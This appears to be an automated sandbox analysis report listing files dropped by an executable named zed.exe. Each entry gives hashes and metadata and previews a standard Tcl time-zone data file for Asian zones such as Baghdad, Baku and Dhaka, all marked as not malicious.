                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baghdad) {.. {-9223372036854775808 10660 0 LMT}.. {-2524532260 10656 0 BMT}.. {-1641005856 10800 0 +03}.. {389048400 14400 0 +03}.. {402264000 10800 0 +03}.. {417906000 14400 1 +03}.. {433800000 10800 0 +03}.. {449614800 14400 1 +03}.. {465422400 10800 0 +03}.. {481150800 14400 1 +03}.. {496792800 10800 0 +03}.. {512517600 14400 1 +03}.. {528242400 10800 0 +03}.. {543967200 14400 1 +03}.. {559692000 10800 0 +03}.. {575416800 14400 1 +03}.. {591141600 10800 0 +03}.. {606866400 14400 1 +03}.. {622591200 10800 0 +03}.. {638316000 14400 1 +03}.. {654645600 10800 0 +03}.. {670464000 14400 1 +03}.. {686275200 10800 0 +03}.. {702086400 14400 1 +03}.. {717897600 10800 0 +03}.. {733622400 14400 1 +03}.. {749433600 10800 0 +03}.. {765158400 14400 1 +03}.. {780969600 10800 0 +03}.. {796694400 14400 1 +03}.. {812505600 10800 0 +03}.. {82831
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):171
                                                                                                                                                                                                                                            Entropy (8bit):4.784355129067593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8hkXHAIgNvZORL/2WFKENUKMFB/4WFKKB:SlSWB9vsM3yBkHAIgPON/2wKENUr/4wT
                                                                                                                                                                                                                                            MD5:1B5E0D449DAEF469D586A853CB3073AD
                                                                                                                                                                                                                                            SHA1:FD735B0472B31644E787767B82B737CC39EC4175
                                                                                                                                                                                                                                            SHA-256:3D437037FBF2BBDF969C8E71967080947F24860D431B39F5D8F23151316ABCD5
                                                                                                                                                                                                                                            SHA-512:2A2DC33D4258A5E1AE59172883F3B11723798ED35CF5AF1B8BA81A8807DC6F8222C8044D82B152EF6AF43E7350FEB2625D4406C6C7DD309CE65810EA3D3286B6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Qatar)]} {.. LoadTimeZoneFile Asia/Qatar..}..set TZData(:Asia/Bahrain) $TZData(:Asia/Qatar)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2149
                                                                                                                                                                                                                                            Entropy (8bit):3.6155622322573713
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5/eFdqlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUTIEjvZJ+76:5RsUf8mFpNWFny1ZGMte3aivUKo
                                                                                                                                                                                                                                            MD5:294DFC98F67AC00A188EC3D3B87C501C
                                                                                                                                                                                                                                            SHA1:93C434CD9AA170E35AD676C88EE09986A94EC02A
                                                                                                                                                                                                                                            SHA-256:873E8F08B87610D0DAFE239D32345248A4595C6B13D1DA83EC214D78E88FA12C
                                                                                                                                                                                                                                            SHA-512:5346082CCA733724C0D2C36B768467E59BA9ED6452B6CF1BA923AF4F0D2BC05C67DB49E804CA81DAD449D30D0835026D708D9AB632D02FDA1EA1A0BF717111DE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baku) {.. {-9223372036854775808 11964 0 LMT}.. {-1441163964 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 14400 0 +04}.. {820440000 14400 0 +04}.. {828234000 18000 1 +05}.. {846378000 14400 0 +04}.. {852062400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.911309754748998
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKELYOiMXGm2OHB+keoHvZKmrROpDovFFsQ+8EXVeVSYe:SlSWB9eg/2wKELeDm2OHxeoHvZ3FO1og
                                                                                                                                                                                                                                            MD5:9AC4947AC29C797055B7EBFA4F6AC710
                                                                                                                                                                                                                                            SHA1:E7758A9A8BFA255F6B2D27F5366D9FE2A26DDF6C
                                                                                                                                                                                                                                            SHA-256:6E72BA908F250FD45D554A12E3E7B3BD2F1C02A6C2431F806FD2A054F843AA90
                                                                                                                                                                                                                                            SHA-512:F9D0F0CB7D3726C2AB3B5049429172D9DD4BA21353F6F98570CBA4EE969F7D97BD973CB165AECFF930AFFA8633E8052624D44EE7FB91763681ED3F78A61F4F98
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bangkok) {.. {-9223372036854775808 24124 0 LMT}.. {-2840164924 24124 0 BMT}.. {-1570084924 25200 0 +07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2117
                                                                                                                                                                                                                                            Entropy (8bit):3.7025684250364725
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5VeTtXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEnsr:5n40yVRB7VfXucdKmtTTDOV
                                                                                                                                                                                                                                            MD5:6CC13B6910412A3A3D16CA36ADF00352
                                                                                                                                                                                                                                            SHA1:061CF4A8FEA8C139F50F96E6B6506B50ED3DD792
                                                                                                                                                                                                                                            SHA-256:992F93A7975F8CD4E94D96B3BA1ECFB3585E52A53F4442A15993402D3F955F66
                                                                                                                                                                                                                                            SHA-512:4E9750B1C3C0BA4F7922BCBC76276A3E74031D78A98E21DC59F66D6EA8E1B70865BBEB50A6B77EB0423421A18428B97B47412053CE15213128CEED669F4DD6E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Barnaul) {.. {-9223372036854775808 20100 0 LMT}.. {-1579844100 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {76470
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8024
                                                                                                                                                                                                                                            Entropy (8bit):3.7230911686481774
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:4nBKPP8LFH0TDkywaZb1QSCK5VUjiO1PoBQpo7778CZicJZS80EGcLt4Mok1MgJl:4M38LCRZb+sAiO1PoBQpo1ikjD
                                                                                                                                                                                                                                            MD5:1D99E2BBB01B1669403CFBAF7E03F733
                                                                                                                                                                                                                                            SHA1:DBDD58C7FD195FC602C4541D6F416CC96094C121
                                                                                                                                                                                                                                            SHA-256:17AF14646D562AFE17DCCFD1D2FBA95C122F3E0263906A36EB48BFF04ACF233E
                                                                                                                                                                                                                                            SHA-512:98524E8DCD17C090058F17BDA1200D9801EB1B14EB5CEB8C31149A4A402A53BA4923A2AFF457E0A72DAA601D88095247806F945F704000F874FCBF73631DD135
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Beirut) {.. {-9223372036854775808 8520 0 LMT}.. {-2840149320 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1473645600 10800 1 EEST}.. {-1460948400 7200 0 EET}.. {-399866400 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336794400 10800 1 EEST}.. {-323578800 7200 0 EET}.. {-305172000 10800 1 EEST}.. {-291956400 7200 0 EET}.. {-273636000 10800 1 EEST}.. {-260420400 7200 0 EET}.. {78012000 10800 1 EEST}.. {86734800 7200 0 EET}.. {105055200 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {212965200 7200 0 EET}.. {231285600 10800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1669
                                                                                                                                                                                                                                            Entropy (8bit):3.7443715330695735
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5qvdJqxiF0rvK5XvV4vUzvCjvT7voPvkPvJUbvn0vYpv99v3uvuWvKJhv3T:Ad1mzK5/VkULCbTjoHkHJUDnQYV9p3mO
                                                                                                                                                                                                                                            MD5:1EE8FF3DF0D931A140ADBB021EB3BFEB
                                                                                                                                                                                                                                            SHA1:F1F15EF70C4E9F456849AF89CAC97AD747D9E192
                                                                                                                                                                                                                                            SHA-256:1D5E9A8F6A04273AF741F648EF10718B004A60D7884FE432DDF85A8F558BEA98
                                                                                                                                                                                                                                            SHA-512:155539A5CF21A34FBFACBF1652D934BF32255F4E505E60B3B4D8B5F2F7FAE552E6CB4824D8608A9C56370F58E48702335995BBD16B7A296A86A72A615FBC8ABC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bishkek) {.. {-9223372036854775808 17904 0 LMT}.. {-1441169904 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {683586000 18000 0 +05}.. {703018800 21600 1 +05}.. {717530400 18000 0 +05}.. {734468400 21600 1 +05}.. {748980000 18000 0 +05}.. {765918000 21600 1 +05}.. {78042
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.949517569857329
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kLP/vXHAIgN16L1RL/2WFKXeAMM7QWFKPLPyn:SlSWB9vsM3yELPHAIg+L1N/2wK0oQwKW
                                                                                                                                                                                                                                            MD5:716D842F23974137C5E07A1A65CEFC5D
                                                                                                                                                                                                                                            SHA1:C7248C9DBD6AE5AF33BD4B3602D17737EBE023A0
                                                                                                                                                                                                                                            SHA-256:F3110E9DD514E3654A9DE777E22B2D2391692927954B4B7E42ED54AB665C3CF5
                                                                                                                                                                                                                                            SHA-512:4EC012EAABE60728D9447EEDF4BA7B16CA82786AA39EE79B2F9B32F227F9816FCE42F173153261F9AF88A12209752E84EBD7170C54D126C2DBB1ED3A8D069668
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kuching)]} {.. LoadTimeZoneFile Asia/Kuching..}..set TZData(:Asia/Brunei) $TZData(:Asia/Kuching)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.774027471796823
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq864DyXHAIgN1QvRL/2WFKh0s+WFKvovn:SlSWB9vsM3ya4DSHAIgcvN/2wKN+wKvy
                                                                                                                                                                                                                                            MD5:8BB098AB77CB0469B1FA0E0B64C4A9E7
                                                                                                                                                                                                                                            SHA1:88C73626985071DD0923E1CAB343ACCD854A7297
                                                                                                                                                                                                                                            SHA-256:1BAEF7850111D2C33B2A766A8AE804534ABA1711BF80A4087A89656DDD8469D5
                                                                                                                                                                                                                                            SHA-512:82216A7F787AF20A4C97C7AA754CD6BE979FEF24137CF9A8B18EECA5E8FBCF12834DD8A6FC9CD2357D807F1629806745B46B11DC0472E0284E18DCCC983897DE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kolkata)]} {.. LoadTimeZoneFile Asia/Kolkata..}..set TZData(:Asia/Calcutta) $TZData(:Asia/Kolkata)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2086
                                                                                                                                                                                                                                            Entropy (8bit):3.6981807774781017
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5Bpr1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2M:95PhtjLiII2ZFlgd
                                                                                                                                                                                                                                            MD5:69E03A5CEB689E19B60168C0F7EBAE8E
                                                                                                                                                                                                                                            SHA1:95C6396EB753753B4FE4AE1B98D76332523E72A4
                                                                                                                                                                                                                                            SHA-256:10B6F435B05D887176A4D90CA5AC957F327F62F36F15D6F6E4F81844662429B9
                                                                                                                                                                                                                                            SHA-512:DFA72EDC54A11F0840ADBEE7F5AD8EA472AA52A1F196292F1341CD92A68FB2EC0A5BC7DE6C8E83C975420DB4B76CECD4393370FDB2C09F86EC11A50E540F6F02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Chita) {.. {-9223372036854775808 27232 0 LMT}.. {-1579419232 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647012
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1619
                                                                                                                                                                                                                                            Entropy (8bit):3.775783980828041
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5th5fSW2sp4Qh2rRSQnGw7GywvWbC25XrMYWG4AIQTUhp9pkTGdXguHaena44XY5:rh5kpmWG29QFUmD
                                                                                                                                                                                                                                            MD5:540A7304A62ABB8D7F84454ABD6E2556
                                                                                                                                                                                                                                            SHA1:52C37529929218A668D7A4AD6FD1B5FE0A727E16
                                                                                                                                                                                                                                            SHA-256:94B2C14EF45C695EF6B19D94722E1BCBB629A595F2866DBA80F00A66721040B5
                                                                                                                                                                                                                                            SHA-512:3B535D109DB369E301D6B412F21EC990976B997826F22B2E16ECEEEB048D60F064C7CA1A616393DC2F1B491BAC0548DC0965B9EA149A95280FFDBCAD6726EF0F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Choibalsan) {.. {-9223372036854775808 27480 0 LMT}.. {-2032933080 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 36000 0 +09}.. {433778400 32400 0 +09}.. {449593200 36000 1 +09}.. {465314400 32400 0 +09}.. {481042800 36000 1 +09}.. {496764000 32400 0 +09}.. {512492400 36000 1 +09}.. {528213600 32400 0 +09}.. {543942000 36000 1 +09}.. {559663200 32400 0 +09}.. {575391600 36000 1 +09}.. {591112800 32400 0 +09}.. {606841200 36000 1 +09}.. {622562400 32400 0 +09}.. {638290800 36000 1 +09}.. {654616800 32400 0 +09}.. {670345200 36000 1 +09}.. {686066400 32400 0 +09}.. {701794800 36000 1 +09}.. {717516000 32400 0 +09}.. {733244400 36000 1 +09}.. {748965600 32400 0 +09}.. {764694000 36000 1 +09}.. {780415200 32400 0 +09}.. {796143600 36000 1 +09}.. {811864800 32400 0 +09}.. {828198000 36000 1 +09}.. {843919200 32400 0 +09}.. {8596
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.865222436335267
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKh2V7/4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKho4wKU
                                                                                                                                                                                                                                            MD5:C5DC40C6325391F7247251ADB2C07F78
                                                                                                                                                                                                                                            SHA1:3DDB1BF94532FB1F1271095B9C8CAA779BC545EF
                                                                                                                                                                                                                                            SHA-256:A87382DC5F3C3141547A65E3746AF1DAF94B51468B96DA6CEF30E95754C97D37
                                                                                                                                                                                                                                            SHA-512:062FF8D5E5392E5372B0405EDF3C7CF997AC33F95EBFFAA9CC9AB82BBE27B60C80255FCCEE9E6F5E02CBFCB163F99984BB2103217FFD1F80BDEC5C684BF2F61A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chongqing) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.889115378893491
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFK7LeL9J4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wK7LUT4wj
                                                                                                                                                                                                                                            MD5:C3676771EB813B346F58A7B574D0D7B5
                                                                                                                                                                                                                                            SHA1:A473EF621309E019F29F3DEF95C38593775B8404
                                                                                                                                                                                                                                            SHA-256:D6D2B4A761C547F1F853AE901AC71AB49FBE825037079C4E0C89DC940AE4A822
                                                                                                                                                                                                                                            SHA-512:21C3A5D499E6E0427FBF585CA8CC5D99D193C586483AB107C4D8E9F9DC8412021E8E019A314757DAFE1225D2635F6D48E9C54A511709863F22A02449FA201E02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chungking) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):369
                                                                                                                                                                                                                                            Entropy (8bit):4.465596050904646
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKr+iDm2OHgoHvZv9tdvjSWV/FSQipPUrKkTD/k5QqRVVFSQOR/UIp:MB862zZmdHgCvZvJvj1Nj+Phkv/YtvjA
                                                                                                                                                                                                                                            MD5:9541BB43E79AB0C6E8163945B5BFB1BF
                                                                                                                                                                                                                                            SHA1:C4994420DB8313DECDE19B4B9F6C5DB0126A95A7
                                                                                                                                                                                                                                            SHA-256:E5B5E6D607A15DA65CB00C92C35A63EAF25F547E64CB34BB419CB8CFC2714B1B
                                                                                                                                                                                                                                            SHA-512:46F623B3F7CF8A50F97DD812521398EB9100C9CDFB967C18EF1BD112306AAEB3C9CB224424E48611CB8CC21D1DC3D820DD83032D12BC9DF19301CF07786FA664
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Colombo) {.. {-9223372036854775808 19164 0 LMT}.. {-2840159964 19172 0 MMT}.. {-2019705572 19800 0 +0530}.. {-883287000 21600 1 +06}.. {-862639200 23400 1 +0630}.. {-764051400 19800 0 +0530}.. {832962600 23400 0 +0630}.. {846266400 21600 0 +06}.. {1145039400 19800 0 +0530}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):169
                                                                                                                                                                                                                                            Entropy (8bit):4.786111096226559
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8ntyXHAIgN6KyFvRL/2WFK1S2WFKwBn:SlSWB9vsM3yHtSHAIgMKON/2wKM2wKwB
                                                                                                                                                                                                                                            MD5:BA575D37459540907A644438071277F8
                                                                                                                                                                                                                                            SHA1:14CF10D6AABBAF7BAE42B3B9641D8469C206567F
                                                                                                                                                                                                                                            SHA-256:B3AD560F66EA330E54A147017E6E6AB64452A5255D097B962D540836D7B19EE7
                                                                                                                                                                                                                                            SHA-512:9CA386EF4D812B00C2E63558B81B273F92BBCA98AF304C9FD6FC166210FC4E2F92B769E1D6FB96B670650DC76EFFAD2FC6E39AE12C24B47EAED4E50A2AFAC2D7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dhaka)]} {.. LoadTimeZoneFile Asia/Dhaka..}..set TZData(:Asia/Dacca) $TZData(:Asia/Dhaka)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3692
                                                                                                                                                                                                                                            Entropy (8bit):3.7832279883701254
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:59xu6+RYla5W87rtYV08a7bd+dYV004X7JkX3Q0dzPeP2ua/XAog7jP/xZsNaTvT:8YI5WpVAdVGlkBOLh8X0CkBheIFlR
                                                                                                                                                                                                                                            MD5:1D6B2CC38669C0F7378D9A576F10C477
                                                                                                                                                                                                                                            SHA1:09A31E6295D9FC39219DFA4FC598B46F55C41180
                                                                                                                                                                                                                                            SHA-256:7E577F0F9DA459BA1A325BE95C1FA0DB2C6ECFC1D64CDB73F3ADB09588293BA7
                                                                                                                                                                                                                                            SHA-512:A0BBD5CE7883C275BF9752C75BA0C9AF0181046D94D27EFC96EC8823C374BADCB69B2B11D2C4497295E5BC25D5790634C69C6E7185F406F2107A8E16044E670F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Damascus) {.. {-9223372036854775808 8712 0 LMT}.. {-1577931912 7200 0 EET}.. {-1568592000 10800 1 EEST}.. {-1554080400 7200 0 EET}.. {-1537142400 10800 1 EEST}.. {-1522630800 7200 0 EET}.. {-1505692800 10800 1 EEST}.. {-1491181200 7200 0 EET}.. {-1474243200 10800 1 EEST}.. {-1459126800 7200 0 EET}.. {-242265600 10800 1 EEST}.. {-228877200 7200 0 EET}.. {-210556800 10800 1 EEST}.. {-197427600 7200 0 EET}.. {-178934400 10800 1 EEST}.. {-165718800 7200 0 EET}.. {-147398400 10800 1 EEST}.. {-134269200 7200 0 EET}.. {-116467200 10800 1 EEST}.. {-102646800 7200 0 EET}.. {-84326400 10800 1 EEST}.. {-71110800 7200 0 EET}.. {-52704000 10800 1 EEST}.. {-39488400 7200 0 EET}.. {-21168000 10800 1 EEST}.. {-7952400 7200 0 EET}.. {10368000 10800 1 EEST}.. {23583600 7200 0 EET}.. {41904000 10800 1 EEST}.. {55119600 7200 0 EET}.. {73526400 10800 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):364
                                                                                                                                                                                                                                            Entropy (8bit):4.412125512631861
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKwiDm2OHEmVFnoHv9vX+Yl7UIFckVVFSQiL/FG/UIvy/Ur9i/Ur97:MB862Y2mdHzdCv9P+Y9vvjeQlP9/9VkK
                                                                                                                                                                                                                                            MD5:B5496A038AC230B9D75AA22BB2BE6BDD
                                                                                                                                                                                                                                            SHA1:ACFD9C78F803F344272E8E188C41ED969EBADA16
                                                                                                                                                                                                                                            SHA-256:BFC4562055CC4355E79F9EFAA580A4C6A658285916159A5D390A0CDA96A97E98
                                                                                                                                                                                                                                            SHA-512:AB05D0176DADC1ED03CC526C372B9827A5FA03459E4F4B4365C6CE4B6FBDA043514A9D3FE2DA747159C5A1BC0E07727E6578A101E42B4DB120AF9624368C5FEA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dhaka) {.. {-9223372036854775808 21700 0 LMT}.. {-2524543300 21200 0 HMT}.. {-891582800 23400 0 +0630}.. {-872058600 19800 0 +0530}.. {-862637400 23400 0 +0630}.. {-576138600 21600 0 +06}.. {1230746400 21600 0 +06}.. {1245430800 25200 1 +06}.. {1262278800 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
